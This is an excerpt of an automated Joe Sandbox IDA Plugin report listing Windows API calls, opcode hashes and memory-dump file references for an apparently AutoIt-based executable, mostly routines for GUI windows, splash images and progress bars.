                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2364484715-0
                                                                                                                        • Opcode ID: 4095b4f7239bd355e580b98cc6b9dbb7c14d11b760a95c93c03d14b79e10dbf3
                                                                                                                        • Instruction ID: 3fed8c6fb0cf6e4ae08c5f6824c5a17b53f1581cc4fba14ee6419780db485b06
                                                                                                                        • Opcode Fuzzy Hash: 4095b4f7239bd355e580b98cc6b9dbb7c14d11b760a95c93c03d14b79e10dbf3
                                                                                                                        • Instruction Fuzzy Hash: BDE01231100208DFCB11AF09DC05EAA37A2FB08340F068050FA00672B2C731A960EF60
                                                                                                                        APIs
                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 00DFF3D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3239928679-0
                                                                                                                        • Opcode ID: 468ee68c45bd12d562253e873e29d561188057a19afd3aac8dc62c688d8ea39e
                                                                                                                        • Instruction ID: d020c5df4b95239b7625c7fdc5d0cc55019c1d8f138fba5094ceacc5fd5dce27
                                                                                                                        • Opcode Fuzzy Hash: 468ee68c45bd12d562253e873e29d561188057a19afd3aac8dc62c688d8ea39e
                                                                                                                        • Instruction Fuzzy Hash: A4E0E23420420CEFCB01DF89D845E8A3BA5FB1A350F004094FD048B262C772A824EBA1
                                                                                                                        APIs
                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 00DFF3A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3239928679-0
                                                                                                                        • Opcode ID: f05c362c27135f3a4c6e8251c926442121fa6766743d32cb7dc6d563c7ee95f8
                                                                                                                        • Instruction ID: 31baff64d44f0568e537d442fcdfa6c4023d2b3aa4bddfc00caa3ad1fb417deb
                                                                                                                        • Opcode Fuzzy Hash: f05c362c27135f3a4c6e8251c926442121fa6766743d32cb7dc6d563c7ee95f8
                                                                                                                        • Instruction Fuzzy Hash: B8E0E23420420CEFCB01DF89DC45E8A3BA5FB1A350F004094FD049B261C772A820DB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                          • Part of subcall function 00DAB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DAB85B), ref: 00DAB926
                                                                                                                          • Part of subcall function 00DAB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DAB85B,00000000,?,?,00DAAF1E,?,?), ref: 00DAB9BD
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00DAAF1E,?,?), ref: 00DAB864
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2797419724-0
                                                                                                                        • Opcode ID: 9e93d5ca640f2311f55186419ff1aac04fb419af88a873acd0296923b5ba5d80
                                                                                                                        • Instruction ID: 1ae091d2a77917b89b0cde3a8220a76c579f016a1690b935a51b8b3b8c03486b
                                                                                                                        • Opcode Fuzzy Hash: 9e93d5ca640f2311f55186419ff1aac04fb419af88a873acd0296923b5ba5d80
                                                                                                                        • Instruction Fuzzy Hash: 9FD0127118430CBBDB142B65DC07F493A1EEB41751F408421FA05791E2CB71A4119575
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00DB8E1F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 26234937167d80fb002ab23861434779fe8665c4c2c54cbe5bbfdbfc86de6389
                                                                                                                        • Instruction ID: 8f08f9bfb186e752e1da7c4370db3339a58c1d293327047232f4e9d4e00b4be9
                                                                                                                        • Opcode Fuzzy Hash: 26234937167d80fb002ab23861434779fe8665c4c2c54cbe5bbfdbfc86de6389
                                                                                                                        • Instruction Fuzzy Hash: 39A0123000450CAB8A001F52EC044847F5CD7041607008010F41C00021C73354104581
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00DB6AE9,00E467D8,00000014), ref: 00DBA937
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: 2d6a61b28bbae5dd79838aaa2373fe7eaa226b356f4cdae3ae77d19fe6f078ec
                                                                                                                        • Instruction ID: fc9e54bfc74fb7664c5080b1ccdf00db31fca28e1937a29c2fe2c1b0e3d1c11b
                                                                                                                        • Opcode Fuzzy Hash: 2d6a61b28bbae5dd79838aaa2373fe7eaa226b356f4cdae3ae77d19fe6f078ec
                                                                                                                        • Instruction Fuzzy Hash: 4BB012F07032024FD70C4F3EAC5419E39D457C9202301803D7403D2561DB308414DF00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                        • Instruction ID: 12b2a56b32ef20891bbcc0aeb869a23d039ab0495035eb56bec8b3fde41ba211
                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                        • Instruction Fuzzy Hash: E4C1AF762052A389DF2D463AC4344BFBEA15EA27B131E476DE8B3CB4C4EE24D564D630
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                        • Instruction ID: 3a8938ad709f015789667b35e442b63f4441d90ef4032d102d9a91026f3f3a6d
                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                        • Instruction Fuzzy Hash: 37C1A1762052A38ADF2D463AC4344BFBFA15AA27B131E476DD8B3CB5C4EE24D524D630
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                        • Instruction ID: 1e03a77b455dbc9c8a83d048c201351c0fc255e0618a373ab1ff64e76d282d7b
                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                        • Instruction Fuzzy Hash: F5C190722052938ADF2D463A84344BFFEA15AA27B531E4B6DE4B3CB4D4EE24D524D630
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                        • Instruction ID: 3cc364695e5f1e477642375573482450ffa88a965bc97eb98ec562cf6b01f739
                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                        • Instruction Fuzzy Hash: FAC1BF722052938ADF2D463A84344BFFFA15AA27B131E4B6DD4B3CB4C1EE24E524C670
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00DEA7A5
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00DEA7B7
                                                                                                                        • DestroyWindow.USER32 ref: 00DEA7C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00DEA7DF
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00DEA7E6
                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00DEA927
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DEA937
                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEA97F
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00DEA98B
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DEA9C5
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEA9E7
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEA9FA
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAA05
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00DEAA0E
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAA1D
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00DEAA26
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAA2D
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00DEAA38
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00DEAA4A
                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E1D9BC,00000000), ref: 00DEAA60
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00DEAA70
                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00DEAA96
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DEAAB5
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEAAD7
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DEACC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                        • Opcode ID: 6895df9d4b40d9f0aa36666fd889d7177bde8eef64467ac79db40b36b1a82b7d
                                                                                                                        • Instruction ID: 7d56556f3b3db4426093e3b997d3b9f83ba494f8361e7ea2503b32502711ad83
                                                                                                                        • Opcode Fuzzy Hash: 6895df9d4b40d9f0aa36666fd889d7177bde8eef64467ac79db40b36b1a82b7d
                                                                                                                        • Instruction Fuzzy Hash: A2029D71A00255EFDB14EF6ACC89EAE7BB9EF48310F148159F915AB2A0C730AD45CB70
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00DFD0EB
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00DFD11C
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00DFD128
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00DFD142
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00DFD151
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00DFD17C
                                                                                                                        • GetSysColor.USER32(00000010), ref: 00DFD184
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00DFD18B
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00DFD19A
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00DFD1A1
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00DFD1EC
                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00DFD21E
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DFD249
                                                                                                                          • Part of subcall function 00DFD385: GetSysColor.USER32(00000012), ref: 00DFD3BE
                                                                                                                          • Part of subcall function 00DFD385: SetTextColor.GDI32(?,?), ref: 00DFD3C2
                                                                                                                          • Part of subcall function 00DFD385: GetSysColorBrush.USER32(0000000F), ref: 00DFD3D8
                                                                                                                          • Part of subcall function 00DFD385: GetSysColor.USER32(0000000F), ref: 00DFD3E3
                                                                                                                          • Part of subcall function 00DFD385: GetSysColor.USER32(00000011), ref: 00DFD400
                                                                                                                          • Part of subcall function 00DFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DFD40E
                                                                                                                          • Part of subcall function 00DFD385: SelectObject.GDI32(?,00000000), ref: 00DFD41F
                                                                                                                          • Part of subcall function 00DFD385: SetBkColor.GDI32(?,00000000), ref: 00DFD428
                                                                                                                          • Part of subcall function 00DFD385: SelectObject.GDI32(?,?), ref: 00DFD435
                                                                                                                          • Part of subcall function 00DFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00DFD454
                                                                                                                          • Part of subcall function 00DFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DFD46B
                                                                                                                          • Part of subcall function 00DFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD480
                                                                                                                          • Part of subcall function 00DFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DFD4A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521893082-0
                                                                                                                        • Opcode ID: 98312e89c80947af6585def2f3030b12e2bf3c81d66cf1ebd7b331e5cdc82772
                                                                                                                        • Instruction ID: 857219437f53be571c7c8facc67fab8e69a746f8721c36da0b904d8035aa7d39
                                                                                                                        • Opcode Fuzzy Hash: 98312e89c80947af6585def2f3030b12e2bf3c81d66cf1ebd7b331e5cdc82772
                                                                                                                        • Instruction Fuzzy Hash: E6918071009305FFC7119F65DC08EAB7BAAFF85320F148A19F662A61E0D775D948CB61
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00DEA42A
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DEA4E9
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00DEA527
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DEA539
                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DEA57F
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00DEA58B
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00DEA5CF
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DEA5DE
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00DEA5EE
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00DEA5F2
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00DEA602
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DEA60B
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00DEA614
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DEA642
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DEA659
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00DEA694
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DEA6A8
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DEA6B9
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00DEA6E9
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00DEA6F4
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DEA6FF
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00DEA709
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
